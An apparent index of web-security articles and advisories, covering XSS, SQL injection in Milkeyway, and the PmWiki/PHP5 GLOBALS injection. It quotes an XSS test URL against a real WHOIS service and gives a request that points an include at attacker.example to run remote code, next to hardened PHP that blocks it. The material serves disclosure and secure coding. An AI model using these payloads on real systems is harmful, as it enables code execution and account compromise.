This is a collection of resources on the topic. Some of these methods are not bullet proof but will help you develop some proactive security when writing new web applications and when hardening the existing ones.
It seems that Microsoft Internet Explorer 7 with the phishing filter active pings back home for every URL requested. This could be the default in many environments.
Until a few days ago, Poste Italiane SPA and the Ministero delle Comunicazioni provided on their respective websites the list of CAPs (postal codes) of Italian localities, free of charge and in a universally accessible format.
This is an English translation of "HttpOnly e Firefox", a whitepaper by my friend Stefano Di Paola written in Italian.
Original Italian version: http://www.wisec.it/sectou.php
WARNING: MASSIVE PR0N USE
Google Maps reversed: this is the solution to the first LugVR Contest, whose topic was reversing Google Maps. See the contest kickoff article for more information. Note: this reverse of Google Maps was done from scratch, ignoring the other resources on the subject, which you can nevertheless find listed at the end of the article.
On the 7th the first LugVR Contest ended; the topic was reversing Google Maps. Interesting, right? It is for all those who are tired of using the official API and interface. The next article will be the solution to the contest.
This is a short email I wrote in reply to v9 AT fakehalo.us on vuln-dev@securityfocus.com, focused on how to exploit XSS vulnerabilities in the real world.
Milkeyway is software for managing and administering internet access within public structures and frameworks, where the provision of the service must be subject to scrupulous inspection. Nearly all of its SQL queries are vulnerable to SQL injection. There are also some XSS vulnerabilities.
J u a n wrote:
> On 3/3/06, Alexander Hristov <joffer@gmail.com> wrote:
>> Just tested : http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22
>> javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>> it still works for me
> works for me on Internet Explorer, didn't work with Firefox 1.5
The purpose of this article is to make the impact of some of the vulnerabilities disclosed in the PmWiki Multiple Vulnerabilities and PHP5 Globals Vulnerability advisories easy to understand.
Some service misuse examples.
PHP5 Globals Vulnerability: with ?GLOBALS[foobar]=value you can set the value of the uninitialized $foobar variable.
This is both a PmWiki and a PHP advisory, and it works only with register_globals on. I had completely missed the PHP GLOBALS[] GPC injection vulnerability and rediscovered it on my own (if only a few months earlier! argh!). Basically, in the worst case we are facing two separate vulnerabilities: one concerning arbitrary remote file inclusion and code execution in PmWiki on PHP 5.x with register_globals on, and the other concerning the reintroduction of a bug that should have been fixed in 5.0.5 but that, in the end, still works on the two most recent versions of PHP 5.
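As an added illustration of the GLOBALS[] injection described above, here is a hypothetical include pattern of the kind that becomes a remote file inclusion when register_globals is on, together with the request that abuses it and a hardened version. This is example code written for this page, not code from PmWiki or from the advisories; the variable name $FarmD, the included path and the attacker host are assumptions.

```php
<?php
// --- Vulnerable pattern (assumed, not PmWiki's actual code) ---
// $FarmD is expected to be set by a configuration file that may be absent,
// so it can reach the include below uninitialized. With register_globals=On,
// PHP 5.x builds affected by the GLOBALS[] GPC injection accept:
//
//   GET /index.php?GLOBALS[FarmD]=http://attacker.example/
//
// after which $FarmD holds the attacker's URL and include_once fetches and
// executes remote code (if allow_url_fopen/allow_url_include permit it).
//
//   include_once("$FarmD/scripts/stdconfig.php");

// --- Hardened form ---
// 1. Refuse any request that smuggles a GLOBALS key through GET/POST/COOKIE.
//    This is the application-level workaround for unpatched PHP builds.
if (isset($_GET['GLOBALS']) || isset($_POST['GLOBALS']) || isset($_COOKIE['GLOBALS'])) {
    header('HTTP/1.0 400 Bad Request');
    exit('Invalid request');
}

// 2. Detect the dangerous interpreter setting instead of silently relying on it.
if (ini_get('register_globals')) {
    error_log('register_globals is enabled; disable it in php.ini');
}

// 3. Initialize every variable before use with a server-controlled value, so
//    request data can never decide where an include comes from.
$FarmD = dirname(__FILE__);   // fixed base directory, never taken from input
include_once("$FarmD/scripts/stdconfig.php");
?>
```

The important point is the third step: injected globals only matter for variables that are read before being assigned, so initializing every variable from a server-controlled source removes the vector even on an affected PHP build; the GLOBALS check and the ini_get warning are defence in depth.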
The article is an Italian translation of Google XSS Example.
Dnsstuff is a great service often integrated into browsers, widgets and extensions. They offer a number of tests (DNS Report, DNS Timing, WHOIS Lookup, Abuse Lookup, Domain Info, Spam database lookup, Reverse DNS lookup, IPWHOIS Lookup, City From IP, IP Routing Lookup, DNS lookup, Traceroute, Ping, ISP cached DNS lookup) and other conversion/math tools (URL deobfuscator, Free E-mail Lookup, CIDR/Netmask, E-mail Test, CSE HTML Validator, Decimal IPs). Where applicable, the tools are both IPv4 and IPv6 capable.